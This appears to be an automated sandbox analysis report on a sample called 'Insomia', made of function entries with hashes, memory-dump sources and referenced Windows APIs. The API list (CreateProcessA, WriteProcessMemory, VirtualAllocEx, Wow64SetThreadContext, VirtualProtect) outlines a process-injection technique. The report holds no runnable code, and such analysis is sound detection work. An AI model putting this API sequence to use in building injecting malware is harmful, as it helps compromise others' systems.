Instruction Fuzzy Hash: 64A1E274A45209CFDB94DFA8D884BEDBBF1FB49310F908069D40AAB291DB746985CF90

Function 060C9868 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: a6e135eb6acd1b6f6c44319dda2519bb64ed1238b159c6cf8373297f59295288
Instruction ID: 53dee94cdbab698fb9fbb70a9bde66a6c6a0f6eaa3fd9af515940b7548649934
Opcode Fuzzy Hash: a6e135eb6acd1b6f6c44319dda2519bb64ed1238b159c6cf8373297f59295288
Instruction Fuzzy Hash: 5571E774A44209CFDB94DFA8D884BAEBBF1FB49310F508469D40AAB394DB746D85CF90

Function 060C9859 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: ba10e2646203847518a87c77323d3fcc4fef4b379499bc1d962092b2453b4a1e
Instruction ID: 409c6b2ffafd4e0e16df20c82d5b5c744108eb1b44656f054e2bb7f715c75d38
Opcode Fuzzy Hash: ba10e2646203847518a87c77323d3fcc4fef4b379499bc1d962092b2453b4a1e
Instruction Fuzzy Hash: F8710570E45208CFDB94DFA8D884BAEBBF1FB49310F508069D40AAB295DB745D85CF91

Function 060C98D3 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

u1, xrefs: 060C9D39

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: u1
API String ID: 0-655931248
Opcode ID: 3682b349f1161c8397b967abce20805c5d9264370ba9158fdbcb631e8388f614
Instruction ID: 145c6d9f3f24b95cd02538d0f4af2f035a695dca980fc07f9ed9df98ca5a8757
Opcode Fuzzy Hash: 3682b349f1161c8397b967abce20805c5d9264370ba9158fdbcb631e8388f614
Instruction Fuzzy Hash: A7710A74A45209CFDB94DFA8D984BAE7BF1FB48310F508069D40AAB394DB346D86CF91

Function 05EE19A3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 717d02a8209169167de3ea137555e71ec28d7869239b2518a122a7d63deaffd2
Instruction ID: bfaa105fda2aaa1f6cfeb487aa10d94f33ed5822124903e625ebe6bbf1694f49
Opcode Fuzzy Hash: 717d02a8209169167de3ea137555e71ec28d7869239b2518a122a7d63deaffd2
Instruction Fuzzy Hash: 9D52B178A042298FCB64DF68C984B9ABBB6FF48301F1091D9D50DA7355DB30AE81CF55

Function 060CB220 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544973dfe53ea8364651881fb7e9bcca06d626d1be5fe634e26265941cd31abb
Instruction ID: 03e2a4614ce705458805c374e90bffba122c60dd2c694493319b5da6283f2f52
Opcode Fuzzy Hash: 544973dfe53ea8364651881fb7e9bcca06d626d1be5fe634e26265941cd31abb
Instruction Fuzzy Hash: B4D1C270D89209CFEB90CF99C459BEEBBF1FB49324F109129D415A7291C7B85986CF88

Function 060CB212 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e347a29c2cd78cb16b1d3f9e2948580c6598d1a0cfa8065c69b540030e561bc2
Instruction ID: 7c24b1aa529283817aea72445c415676b9ee77cf1d7f5d2d8dce41d028be8c73
Opcode Fuzzy Hash: e347a29c2cd78cb16b1d3f9e2948580c6598d1a0cfa8065c69b540030e561bc2
Instruction Fuzzy Hash: A1D1D270D89209CFEB90CF99C455BEEBBF1FB49324F109129D415A7291C7785986CF88

Function 016D7F10 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2859292f70a94f4eeaf94cb8c896af452a76a77105efb477c186819862fb6352
Instruction ID: a13255774e374d7ac8828618edc3c61f39e4e1609a490ef3c3b2970084a84d70
Opcode Fuzzy Hash: 2859292f70a94f4eeaf94cb8c896af452a76a77105efb477c186819862fb6352
Instruction Fuzzy Hash: 1551BF71E08205DFDB51CFA8CD40BAABBB5FB98310F148066E505EB2A1D7798D46CB91

Function 05EE0006 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13313cc2639775f61b9efd1be87283509cb64f69048a5a1aa8d1945d629ff6f
Instruction ID: 0aff1938a27993732e542eb7dd2bcc7ff944597b3c8bc15f0dcafdbc48cd9778
Opcode Fuzzy Hash: b13313cc2639775f61b9efd1be87283509cb64f69048a5a1aa8d1945d629ff6f
Instruction Fuzzy Hash: 3061FE71E04B188FD719CF6BCC4428ABBF3AFC9301F18C0AAD449AA259EB745985CF50

Function 016D7F70 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6730e4b81254e80a342dd8ea8534356eddcf78cd7c4fa9420ed22599035ed21f
Instruction ID: 05b29f1357626d3a7b30ce07b7d00810aa7f0e211377472bcefcc852b2f3f5b8
Opcode Fuzzy Hash: 6730e4b81254e80a342dd8ea8534356eddcf78cd7c4fa9420ed22599035ed21f
Instruction Fuzzy Hash: C151F171E44209DFD751CFA8DD44BAEBBB5FB98310F108166E606EB291E6798C06CB41

Function 016D1068 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e05f73743a7d7e4ae5f67e436aef3afabb6220f3463268b00e55635eddfe28
Instruction ID: 06e41783c27e9fd69630be5f87afe626ed59ef1501c7c1e7fe6ce50967e19472
Opcode Fuzzy Hash: 14e05f73743a7d7e4ae5f67e436aef3afabb6220f3463268b00e55635eddfe28
Instruction Fuzzy Hash: 4E517C71F04249DFDB10DFA8CD50BAABBB5EB49300F148126E505EB390DBB59E42CB91

Function 016D1078 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f35fc50f0bdf0524db61ad99a8947b2b291579642847f8783c992a9185740f
Instruction ID: 19c814e7a03c93ec7f41da14a14a1790cc3210c6b52e3d5c3fd836b1941697f2
Opcode Fuzzy Hash: 79f35fc50f0bdf0524db61ad99a8947b2b291579642847f8783c992a9185740f
Instruction Fuzzy Hash: 00416771F44209DBDB10DFA8CD50BAEBBB5EB49300F148526E605EB394DAB59E42CB81

Function 01B43570 Relevance: 3.6, Strings: 2, Instructions: 1145COMMON

Download Yara Rule

Strings

4']q, xrefs: 01B44329
4']q, xrefs: 01B44319

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 31e445179176fc890e05bd8aa37b36fba8cdfc24d4ac071b7e833a26950fb578
Instruction ID: 599f303d402f3a0ee185a2f8cf7351af786d5ede1f7331a0d65f46dc45ea1022
Opcode Fuzzy Hash: 31e445179176fc890e05bd8aa37b36fba8cdfc24d4ac071b7e833a26950fb578
Instruction Fuzzy Hash: 47A29F30E09358DFDB1ACBB8C859BAE7FB5FF46300F14819AE541AB2A2C7345845DB61

Function 01B44690 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 01B44B36
4']q, xrefs: 01B44B26

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 665ad7a995e8bf0b23c5e856c479978a4001501a896bad3f2587abd709f00824
Instruction ID: 6e13d8d02ee03b32b069f78a8192f58dc7f252636c23782c598ed9a3f9215df2
Opcode Fuzzy Hash: 665ad7a995e8bf0b23c5e856c479978a4001501a896bad3f2587abd709f00824
Instruction Fuzzy Hash: AEF1EB34E01218DFCF19DFA9E4996ACBBB2FF4A305F608169E446A7390DB706995DF00

Function 05E912DF Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

=s], xrefs: 05E91348
d%cq, xrefs: 05E9135E

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: =s]$d%cq
API String ID: 0-3956421431
Opcode ID: 2520cce3d7040f376a87815a7bf12559b6c1c650a73459653c027ca8392d0afd
Instruction ID: 67542abeecd5c6bd47cbd37637c4c552dfa919d8670fcf9f4bbfa2fe7fbb3902
Opcode Fuzzy Hash: 2520cce3d7040f376a87815a7bf12559b6c1c650a73459653c027ca8392d0afd
Instruction Fuzzy Hash: 4C419A78A04219CFDB54DF68CC84B9AB7B2FF89300F5081A8940AEB354DB349D86CF52

Function 05E916A8 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

$]q, xrefs: 05E917C1
$]q, xrefs: 05E917AB

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 61e5cb97ac463c8d112f8551338d34ec9846c87410cbef351333700eae4f7f91
Instruction ID: f25947b49be3dab706d51d7983585f55cd2cc1bd022e6601fe3d3e3665610a85
Opcode Fuzzy Hash: 61e5cb97ac463c8d112f8551338d34ec9846c87410cbef351333700eae4f7f91
Instruction Fuzzy Hash: 8D312979A011198BEB28DFA9DD80BE9B7F2FF88210F5081A6D50DA7354EB355D82CF50

Function 05EE7D0B Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

n, xrefs: 05EE7D24
=, xrefs: 05EE8EB3

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: =$n
API String ID: 0-2282750504
Opcode ID: 48eef3f8e4160783ff6c204b5749f8fab7714365798858efc7a34b5211c9ba15
Instruction ID: 3a08726e89532101ada3d36fe1edf2cbcf9ac468897d14fa6b076982c8c59982
Opcode Fuzzy Hash: 48eef3f8e4160783ff6c204b5749f8fab7714365798858efc7a34b5211c9ba15
Instruction Fuzzy Hash: 92012870929359DFEB22CF54C844BFDB6BAFB4A704F102199D48A72290D7744A81CF41

Function 05EE7D42 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

B, xrefs: 05EE7D4F
R, xrefs: 05EE9CB7

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID: B$R
API String ID: 0-4174533058
Opcode ID: dc5c5f20030f9708e034629399d7eb54615a652307e61a963966d176e345fe32
Instruction ID: 04f3c7fd98f40b38e5a75bf066eeca87099f00a78794dd2d799668f7151b7e90
Opcode Fuzzy Hash: dc5c5f20030f9708e034629399d7eb54615a652307e61a963966d176e345fe32
Instruction Fuzzy Hash: 92117B70921269DFDBA1DF68D888BADB7B9FB09304F1451E9A499B6240DB781AC4CF01

Function 060C86E5 Relevance: 2.5, Strings: 2, Instructions: 24COMMON

Download Yara Rule

Strings

., xrefs: 060C8716
9, xrefs: 060C873C

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: .$9
API String ID: 0-1669323606
Opcode ID: 734172d962c519e99c63fff8bdaeff1ff48f88823eef121b81fea0f5d5d9fed2
Instruction ID: 8e4120d0db6a0133628bb8f970b471e9f7acbe7021b35a1b87cdf93021c4efbc
Opcode Fuzzy Hash: 734172d962c519e99c63fff8bdaeff1ff48f88823eef121b81fea0f5d5d9fed2
Instruction Fuzzy Hash: 37F0B274A84218CFDBA4DF94D888B9EBBF2FB49314F609098D449A7348C7799D85CF50

Function 01B43550 Relevance: 1.9, Strings: 1, Instructions: 644COMMON

Download Yara Rule

Strings

4']q, xrefs: 01B44319

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 50d456e9bf3749375b7b288515c96bd806b73db829ab6a53e194ed00f87656f6
Instruction ID: 581319d7e8e9676816e92025c27c8de67cc9300a3f62b1234122a654f0200418
Opcode Fuzzy Hash: 50d456e9bf3749375b7b288515c96bd806b73db829ab6a53e194ed00f87656f6
Instruction Fuzzy Hash: EA321B7094A3949FD71B87788C59B9A3FB4AF03701F1981DBE180EB2E3C6795849C762

Function 061BF00F Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061BF27F

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0e206dd2c5877cac1d8730f0ffdc4cdb6b85a192a31b60b33a090378a4f88372
Instruction ID: 0b447188f19693c473032d84a73552778a72ef840b7f60233d88d90a48fd9e48
Opcode Fuzzy Hash: 0e206dd2c5877cac1d8730f0ffdc4cdb6b85a192a31b60b33a090378a4f88372
Instruction Fuzzy Hash: 9CA113B4D002598FDB50CFA9C8857EDBBB1BF09300F14A569E858A7290DB749986CF45

Function 061BF018 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061BF27F

Memory Dump Source

Source File: 00000000.00000002.2131941319.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61b0000_Insomia.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6dbdf400348aeb09a81aec8d1f9aabeec75aab2756468e2ad1347b7c4e2afe6a
Instruction ID: db87e8aa489334dbd9804702a97dc87c29a79b00777cfb81bd371472e5066df7
Opcode Fuzzy Hash: 6dbdf400348aeb09a81aec8d1f9aabeec75aab2756468e2ad1347b7c4e2afe6a
Instruction Fuzzy Hash: 6DA112B4D00259CFDB50CFA9C8857EEBBB1FF09300F14A569E858A7290DB749986CF45

Function 05EFC747 Relevance: 1.7, APIs: 1, Instructions: 155fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05EFC894

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b1f747d8b31a50608483bc618ca11c898c64129d76399ab024a56fca082e81f0
Instruction ID: db6400d9212e0f9e49cd4f7b747b6517946e1c4eec6b82b2cdedc8af144f80c6
Opcode Fuzzy Hash: b1f747d8b31a50608483bc618ca11c898c64129d76399ab024a56fca082e81f0
Instruction Fuzzy Hash: 4951EFB5D0425C9FDF10CFA9D985ADEBBB1BB09304F20A42AE959B7240DB749845CF44

Function 05EFC750 Relevance: 1.7, APIs: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05EFC894

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2420e9a6397a97b1b166437b92305e8790dd1c65d9066e12e47380d42aa67516
Instruction ID: faad0e705a785a9c0e35226a66ec858128d1846459d949190c36fea46b3e8aa2
Opcode Fuzzy Hash: 2420e9a6397a97b1b166437b92305e8790dd1c65d9066e12e47380d42aa67516
Instruction Fuzzy Hash: 9A51DEB4D0425C9FDF10CFA9D884A9EBBB1BB49304F20A42AE959A7240DB74A885CF54

Function 05EFCBA1 Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05EFCCDE

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: c87e661e22f7493e3928f71430b2a4085839c920ca41219abca63304aacc3d8d
Instruction ID: 5934e33a6d936d1997249bf14d5772cb31137c9a0c7f00f0ac5b353b8a20211d
Opcode Fuzzy Hash: c87e661e22f7493e3928f71430b2a4085839c920ca41219abca63304aacc3d8d
Instruction Fuzzy Hash: 8451E0B4D0431C9FDF10CFA9C985AAEBBB1BF09304F209029E959B7250DB349985DF85

Function 05EFCBA8 Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05EFCCDE

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 7c209f3d6c3f23e6f1197b71cb6e128b96089808b817787deeec8c544b68535a
Instruction ID: 93005c470da568309bb2e8fbf1aaf3718d95f3ce8f8bbb9b7adc722ad69f6fc6
Opcode Fuzzy Hash: 7c209f3d6c3f23e6f1197b71cb6e128b96089808b817787deeec8c544b68535a
Instruction Fuzzy Hash: 6351F2B4D0431C9FDF10CFA9C985AAEBBB1BF09304F209029E959B7250DB349985DF85

Function 061AFDA8 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061AFE83

Memory Dump Source

Source File: 00000000.00000002.2131893356.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_Insomia.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a04c52fd1ca77689467e083f25a1950b0f8b792f2c71d693ce267f35021e5318
Instruction ID: 2068883c8ce179d8f4266143b543f0ebb2e41c8939d36280b1571c0c29bfb3f4
Opcode Fuzzy Hash: a04c52fd1ca77689467e083f25a1950b0f8b792f2c71d693ce267f35021e5318
Instruction Fuzzy Hash: 5C41ACB4D012589FCB00CFA9D984AEEFBF1FB49310F24942AE859B7251D734AA45CF64

Function 061AFDB0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061AFE83

Memory Dump Source

Source File: 00000000.00000002.2131893356.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_Insomia.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: da56a7d82b9ff024089fc70ecf7e2c60fc27a16f7c7bbcbee00b41dec55c5407
Instruction ID: badc7d200fc1276e170e709391d4c7a2f2d8d0fe39e205e25862dbbf2785e515
Opcode Fuzzy Hash: da56a7d82b9ff024089fc70ecf7e2c60fc27a16f7c7bbcbee00b41dec55c5407
Instruction Fuzzy Hash: ED419CB4D012589FCF00CFAAD984ADEFBF1BB49310F20942AE418B7250D734AA45CF64

Function 05EFCF59 Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05EFD00A

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 585432d3791b28061392962f4baae0b85429f21cd3ff02ce9e14de5d4fdf4418
Instruction ID: 8811168d25efd9e620fa951195b4e278d136cdcad41e1caba63c836abd8ba4c9
Opcode Fuzzy Hash: 585432d3791b28061392962f4baae0b85429f21cd3ff02ce9e14de5d4fdf4418
Instruction Fuzzy Hash: 7B31A9B8D002589BCF10CFA9D980ADEFBB1FB49310F10A02AE915B7210D735A942CF68

Function 062103B0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06210462

Memory Dump Source

Source File: 00000000.00000002.2132081413.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_Insomia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93716017cce02aea24ea0016e6613258f96456cc740956bd4f3ef7b772331cf0
Instruction ID: b36061039427cfe58be27cf089de05c56c03b9beea1ecf6bbdf52838fbe4f6d1
Opcode Fuzzy Hash: 93716017cce02aea24ea0016e6613258f96456cc740956bd4f3ef7b772331cf0
Instruction Fuzzy Hash: B94198B8D042589FCF10CFA9D984ADEFBB5BF59310F20942AE815BB210D735A945CFA4

Function 05EFCF60 Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05EFD00A

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 02f827a000f969071a828bed1bbad312c71786a3835b964244f59906ce9e4976
Instruction ID: 8de27aa874f1a8bcb3fe778fcba0289bfda42cfaf2718bd5c8b7940ae6588aca
Opcode Fuzzy Hash: 02f827a000f969071a828bed1bbad312c71786a3835b964244f59906ce9e4976
Instruction Fuzzy Hash: 9C3179B9D002589BCF10CFA9D984A9EFBB5BB49310F10942AE915B7210D735A946CF54

Function 062103B8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06210462

Memory Dump Source

Source File: 00000000.00000002.2132081413.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6210000_Insomia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d7e1799947d779884b92ff991a549795f1cd5a1cb2944b00e9739de4ebced113
Instruction ID: b7b25d1da68c375ebc68ea4bce0f35e82dde8f2574f2c7d9572a3ab081f235d3
Opcode Fuzzy Hash: d7e1799947d779884b92ff991a549795f1cd5a1cb2944b00e9739de4ebced113
Instruction Fuzzy Hash: 0C3188B8D042589FCF10CFA9D984ADEFBB5BB59310F10942AE815BB210D735A945CFA4

Function 05EFFCB0 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05EFFD67

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8f296410f8a538c16c46624e9299180dbca5179710ec7af0c0a403a6d42001b3
Instruction ID: ee29eb1658d95d01486e3cfd062fd71a493086dfa06dfca0635ad2188f65c4f5
Opcode Fuzzy Hash: 8f296410f8a538c16c46624e9299180dbca5179710ec7af0c0a403a6d42001b3
Instruction Fuzzy Hash: 3441EEB4D012589FCB10CFA9D884AEEFBF1BF49314F24902AE459B7240C739A985CF94

Function 05EF9878 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05EF9924

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 820470f63861f0c4c239b357443bfb29dc979f5ec23e4f4531bffa015c4042c7
Instruction ID: e2e76939622b68f0bcbaf59b05aaffda6d95e240e462e81b27a1d42f3c99f793
Opcode Fuzzy Hash: 820470f63861f0c4c239b357443bfb29dc979f5ec23e4f4531bffa015c4042c7
Instruction Fuzzy Hash: F031CDB4D002589FCF10CFA9D584AEEFBB1BF49310F10942AE955B7210D735A945CF54

Function 05EF9880 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05EF9924

Memory Dump Source

Source File: 00000000.00000002.2130855093.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ef0000_Insomia.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
